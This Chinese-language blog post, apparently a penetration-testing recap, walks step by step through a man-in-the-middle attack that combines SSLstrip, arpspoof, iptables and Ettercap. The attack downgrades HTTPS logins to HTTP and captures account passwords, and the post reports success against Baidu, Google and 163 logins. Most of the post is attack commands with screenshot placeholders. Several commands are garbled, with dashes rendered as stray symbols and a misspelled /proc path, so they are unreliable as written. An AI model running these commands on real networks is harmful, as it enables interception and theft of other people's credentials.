SSLstrip 中间人欺骗Https转Http获取密码

渗透回顾

SSLstrip + EtterCap 中间人攻击实现https转换成http 以获取帐号密码。

Linux环境下 我们使用iptables过滤一下数据包,然后用sslstrip监听端口,获取数据。

数据包转发 echo 1 > /pro/sys/net/ipv4/ip_forward

然后开启Ettercap的iptables 功能

clip_image001

clip_image003

把注析去掉

来个arp欺骗不使用sslstrip 来测试一下https

Arpspoof �Ci �Ceth0 �Ct 192.168.1.102 192.168.1.2

clip_image005

Ok

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

NAT 一定的基础

-T 匹配的表 NAT表 :PREROUTING 修改来的包

:OUTPUT 修改路由前本地的包

:POSTROUTING 修改准备发出的包

-A 表示加入高级选项

-P 协议类型

-J 表示把目标80端口的数据包转到其他端口 上诉命令是10000端口

开启ETTERCAP

Ettercap �CT �Cq �CI eth0

clip_image007

clip_image009

登录http的百度 效果良好

监听到数据了

clip_image011

clip_image013

登录google

发现在https 卡顿 无法通过

clip_image014

开启sslstrip

clip_image016

clip_image018

再向google登录的时候 https变成http

clip_image020

成功登录

clip_image022

监听到帐号密码

clip_image024

百度的

clip_image026

clip_image028

163的登录

clip_image030

http的跳转

clip_image032

网速过慢……

除了使用arpspoof 还可以使用

Ettercap �CT �Cq �CM arp:remote /192.168.1.101/ //

也是arp欺骗 原理一样的。

你可能感兴趣的:(target,blank,中间人)